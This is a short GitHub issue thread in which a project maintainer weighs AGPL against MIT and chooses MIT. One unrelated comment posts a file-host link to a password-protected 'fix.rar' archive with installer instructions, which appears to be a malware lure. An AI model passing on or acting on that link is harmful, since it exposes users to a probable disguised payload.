### ISSUE TITLE
Choose  and add a licence 

### ISSUE THREAD

**Issue by mitra42** [mitra42/frugal-iot#2]
Package needs a licence - and the choice might be important

I've used AGL in the past, but that might or might not be appropriate.

**Comment by vineet1401** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by mitra42** [comment]
Any thoughts on this ? Since one of the goals is to allow social ventures to use it as a jump-start then it may be better to make it more widely usable - e.g. MIT rather than constraining them (rather than using social pressure) to release their source.

**Comment by mitra42** [comment]
OK - using MIT
